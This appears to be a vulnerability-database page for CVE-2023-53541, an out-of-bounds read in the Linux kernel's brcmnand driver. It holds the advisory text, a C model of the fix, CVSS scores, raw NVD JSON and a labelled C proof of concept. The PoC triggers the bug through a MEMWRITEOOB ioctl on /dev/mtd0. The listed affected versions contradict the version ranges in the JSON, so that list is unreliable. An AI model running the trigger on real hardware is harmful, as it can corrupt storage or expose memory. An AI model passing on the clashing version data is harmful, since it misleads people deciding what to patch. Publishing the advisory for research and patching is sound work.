Security Vulnerability Report
CVE-2023-53541 CVSS 7.8 HIGH

CVE-2023-53541

Published: 2025-10-04 16:15:49
Last Modified: 2026-03-25 00:42:00
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

mtd: rawnand: brcmnand: Fix potential out-of-bounds access in oob write

When the oob buffer length is not in multiple of words, the oob write function does out-of-bounds read on the oob source buffer at the last iteration. Fix that by always checking length limit on the oob buffer read and fill with 0xff when reaching the end of the buffer to the oob registers.
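A user-space model of the flaw and the fix described above, added here as an illustration and not taken from the kernel driver. The function names, the big-endian packing order and the `regs[]` array standing in for the controller's OOB registers are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Bytes an unchecked loop reads past the end of the source: it always
 * consumes oob[i]..oob[i+3], so the last pass overruns when len % 4 != 0. */
static size_t unchecked_overread(size_t len)
{
    return (4 - len % 4) % 4;
}

/* Bounds-checked fetch: past the end of the source buffer, supply 0xff
 * (the erased-NAND value) instead of reading adjacent memory. */
static uint8_t oob_byte(const uint8_t *oob, size_t len, size_t idx)
{
    return idx < len ? oob[idx] : 0xff;
}

/* Hardened packing into 32-bit words, every source read length-checked.
 * Returns the number of words written, or 0 if regs[] is too small. */
static size_t pack_oob_words(const uint8_t *oob, size_t len,
                             uint32_t *regs, size_t nregs)
{
    size_t words = (len + 3) / 4;

    if (words > nregs)
        return 0;
    for (size_t w = 0; w < words; w++) {
        size_t i = w * 4;
        regs[w] = (uint32_t)oob_byte(oob, len, i) << 24 |
                  (uint32_t)oob_byte(oob, len, i + 1) << 16 |
                  (uint32_t)oob_byte(oob, len, i + 2) << 8 |
                  (uint32_t)oob_byte(oob, len, i + 3);
    }
    return words;
}

int main(void)
{
    const uint8_t oob[5] = { 0xAA, 0xAA, 0xAA, 0xAA, 0xAA }; /* constructed */
    uint32_t regs[2];
    size_t n = pack_oob_words(oob, sizeof(oob), regs, 2);

    printf("unchecked loop would over-read %zu byte(s)\n",
           unchecked_overread(sizeof(oob)));
    for (size_t w = 0; w < n; w++)
        printf("reg[%zu] = 0x%08x\n", w, (unsigned)regs[w]);
    return 0;
}
```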

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 6.1.63
Linux kernel 6.2.x < 6.2.13
Linux kernel 6.3.x < 6.3.2
Linux kernel 6.4.x < 6.4.10
Linux kernel 6.5.x < 6.5.5
Linux kernel 6.6.x < 6.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * CVE-2023-53541 PoC - Linux Kernel brcmnand OOB Out-of-Bounds Read
 *
 * This PoC demonstrates the vulnerability by writing OOB data with
 * a length that is not word-aligned, triggering an out-of-bounds read
 * on the source buffer in the brcmnand driver.
 *
 * Note: This requires a system with Broadcom NAND controller and
 * appropriate device permissions (e.g., /dev/mtd* access).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <mtd/mtd-user.h>

int main(int argc, char *argv[])
{
    int fd;
    int ret;
    struct mtd_oob_buf oob;
    const char *dev = "/dev/mtd0";

    /* Allocate a buffer with non-word-aligned length to trigger the bug */
    /* Word size is 4 bytes; using length 5 (not multiple of 4) */
    unsigned char *buf = (unsigned char *)malloc(5);
    if (!buf) {
        perror("malloc");
        return 1;
    }

    /* Fill with known pattern */
    memset(buf, 0xAA, 5);

    /* Open the MTD device */
    fd = open(dev, O_RDWR);
    if (fd < 0) {
        perror("open");
        free(buf);
        return 1;
    }

    /* Setup OOB write operation */
    oob.start = 0;
    oob.length = 5; /* Non-word-aligned length triggers OOB read */
    oob.ptr = buf;

    /* Attempt OOB write - this triggers out-of-bounds read on the source */
    ret = ioctl(fd, MEMWRITEOOB, &oob);
    if (ret < 0) {
        perror("MEMWRITEOOB");
    } else {
        printf("OOB write completed. Potential OOB read may have occurred.\n");
    }

    close(fd);
    free(buf);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53541", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:49.160", "lastModified": "2026-03-25T00:41:59.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmtd: rawnand: brcmnand: Fix potential out-of-bounds access in oob write\n\nWhen the oob buffer length is not in multiple of words, the oob write\nfunction does out-of-bounds read on the oob source buffer at the last\niteration. Fix that by always checking length limit on the oob buffer\nread and fill with 0xff when reaching the end of the buffer to the oob\nregisters."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.2", "versionEndExcluding": "4.14.326", "matchCriteriaId": "47178EA3-9838-42AF-90AA-F3E84BDF403D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.295", "matchCriteriaId": "D419C7D6-F33D-4EF8-8950-1CB5DDF6A55D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.257", "matchCriteriaId": 
"834BD148-28EC-43A4-A4F5-458124A1E39F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.195", "matchCriteriaId": "C385B650-53DB-4BFB-83D1-1D8FADF653EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.132", "matchCriteriaId": "5913891D-409A-4EEC-9231-F2EF5A493BC7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.54", "matchCriteriaId": "7353B9B4-AFFC-45DE-840E-1A7D2B00E7AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.5.4", "matchCriteriaId": "CA8C8B88-AF36-445D-A228-AD78F3615373"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/14b1d00520b4d6a4818364334ce472b79cfc8976", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2353b7bb61e45e7cfd21505d0c6747ac8c9496a1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2bc3d6ac704ea7263175ea3da663fdbbb7f3dd8b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/45fe4ad7f439799ee1b7b5f80bf82e8b34a98d25", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5d53244186c9ac58cb88d76a0958ca55b83a15cd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/648d1150a688698e37f7aaf302860180901cb30e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/aae45746f4aee9818296e0500e0703e9d8caa5b8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/d00b031266514a9395124704630b056a5185ec17", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}